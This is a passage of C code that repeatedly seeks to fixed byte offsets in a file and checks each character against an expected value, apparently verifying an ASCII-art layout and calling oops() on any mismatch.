fseek(fp,68,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,155,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,673,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,35,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,309,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,148,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,280,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,474,SEEK_SET);c=fgetc(fp);if(c != 96){oops();} fseek(fp,240,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,178,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,340,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,695,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,526,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,286,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,313,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,259,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,543,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,256,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,584,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,97,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,55,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,0,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,22,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,615,SEEK_SET);c=fgetc(fp);if(c != 47){oops();} fseek(fp,300,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,30,SEEK_SET);c=fgetc(fp);if(c != 46){oops();} fseek(fp,634,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,676,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,298,SEEK_SET);c=fgetc(fp);if(c != 46){oops();} fseek(fp,428,SEEK_SET);c=fgetc(fp);if(c != 96){oops();} fseek(fp,250,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,93,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,505,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,556,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,586,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,697,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,496,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,222,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,720,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,324,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,501,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,361,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,44,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,442,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,683,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,306,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,567,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,118,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,610,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,197,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,702,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,326,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,61,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,374,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,355,SEEK_SET);c=fgetc(fp);if(c != 47){oops();} fseek(fp,493,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,279,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,4,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,80,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,116,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,317,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,668,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,618,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,435,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,666,SEEK_SET);c=fgetc(fp);if(c != 92){oops();} fseek(fp,268,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,458,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,20,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,248,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,111,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,120,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,574,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,651,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,228,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,486,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,23,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,316,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,341,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,92,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,98,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,130,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,183,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,281,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,38,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,29,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,335,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,454,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,715,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,19,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,636,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,357,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,705,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,504,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,275,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,147,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,173,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,299,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,239,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,104,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,591,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,641,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,708,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,421,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,477,SEEK_SET);c=fgetc(fp);if(c != 39){oops();} fseek(fp,49,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,548,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,114,SEEK_SET);c=fgetc(fp);if(c != 47){oops();} fseek(fp,82,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,254,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,617,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,345,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,251,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,399,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,163,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,598,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,377,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,6,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,203,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,213,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,270,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,664,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,438,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,45,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,329,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,655,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,667,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,191,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,387,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,242,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,436,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,707,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,423,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,409,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,237,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,31,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,205,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,592,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,238,SEEK_SET);c=fgetc(fp);if(c != 96){oops();} fseek(fp,21,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,706,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,27,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,188,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,645,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,450,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,596,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,716,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,402,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,186,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,430,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,429,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,158,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,100,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,24,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,274,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,572,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,652,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,209,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,475,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,199,SEEK_SET);c=fgetc(fp);if(c != 92){oops();} fseek(fp,57,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,633,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,315,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,512,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,499,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,622,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,558,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,232,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,177,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,718,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,396,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,576,SEEK_SET);c=fgetc(fp);if(c != 92){oops();} fseek(fp,681,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,36,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,422,SEEK_SET);c=fgetc(fp);if(c != 39){oops();} fseek(fp,272,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,654,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,319,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,137,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,172,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,65,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,523,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,235,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,95,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,142,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,252,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,611,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,124,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,206,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,462,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,492,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,88,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,143,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,709,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,382,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,703,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,367,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,542,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,66,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,296,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,321,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,485,SEEK_SET);c=fgetc(fp);if(c != 96){oops();} fseek(fp,262,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,54,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,102,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,521,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,208,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,115,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,338,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,194,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,215,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,534,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,189,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,378,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,151,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,204,SEEK_SET);c=fgetc(fp);if(c != 92){oops();} fseek(fp,339,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,406,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,719,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,364,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,202,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,465,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,388,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,491,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,457,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,69,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,710,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,60,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,589,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,86,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,99,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,348,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,334,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,632,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,444,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,466,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,639,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,159,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,497,SEEK_SET);c=fgetc(fp);if(c != 92){oops();} fseek(fp,161,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,635,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,365,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,325,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,323,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,295,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,662,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,500,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,691,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,551,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,223,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,284,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,176,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,198,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,575,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,224,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,156,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,84,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,563,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,363,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,637,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,278,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,550,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,650,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,557,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,167,SEEK_SET);c=fgetc(fp);if(c != 92){oops();} fseek(fp,58,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,89,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,308,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,2,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,426,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,469,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,568,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,601,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,190,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,322,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,174,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,372,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,602,SEEK_SET);c=fgetc(fp);if(c != 92){oops();} fseek(fp,303,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,690,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,276,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,241,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,404,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,569,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,234,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,507,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,411,SEEK_SET);c=fgetc(fp);if(c != 92){oops();} fseek(fp,612,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,253,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,726,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,381,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,536,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,227,SEEK_SET);c=fgetc(fp);if(c != 45){oops();} fseek(fp,119,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,403,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,50,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,328,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,717,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,56,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,34,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,107,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,607,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,184,SEEK_SET);c=fgetc(fp);if(c != 92){oops();} fseek(fp,291,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,410,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,580,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,383,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,153,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,578,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,541,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,283,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,247,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,346,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,533,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,146,SEEK_SET);c=fgetc(fp);if(c != 47){oops();} fseek(fp,386,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,201,SEEK_SET);c=fgetc(fp);if(c != 92){oops();} fseek(fp,301,SEEK_SET);c=fgetc(fp);if(c != 46){oops();} fseek(fp,135,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,678,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,293,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,5,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,588,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,687,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,606,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,640,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,577,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,16,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,126,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,285,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,418,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,594,SEEK_SET);c=fgetc(fp);if(c != 47){oops();} fseek(fp,77,SEEK_SET);c=fgetc(fp);if(c != 46){oops();} fseek(fp,347,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,11,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,185,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,370,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,249,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,331,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,83,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,675,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,9,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,445,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,10,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,171,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,76,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,539,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,573,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,448,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,495,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,661,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,419,SEEK_SET);c=fgetc(fp);if(c != 39){oops();} fseek(fp,724,SEEK_SET);c=fgetc(fp);if(c != 47){oops();} fseek(fp,51,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,145,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,47,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,722,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,220,SEEK_SET);c=fgetc(fp);if(c != 44){oops();} fseek(fp,289,SEEK_SET);c=fgetc(fp);if(c != 92){oops();} fseek(fp,79,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,397,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,128,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,671,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,53,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,110,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,616,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,434,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,665,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,166,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,131,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,516,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,379,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,369,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,168,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,271,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,629,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,40,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,621,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,32,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,427,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,677,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,517,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,600,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,547,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,105,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,653,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,265,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,553,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,663,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,565,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,244,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,255,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,304,SEEK_SET);c=fgetc(fp);if(c != 124){oops();} fseek(fp,524,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} fseek(fp,609,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} 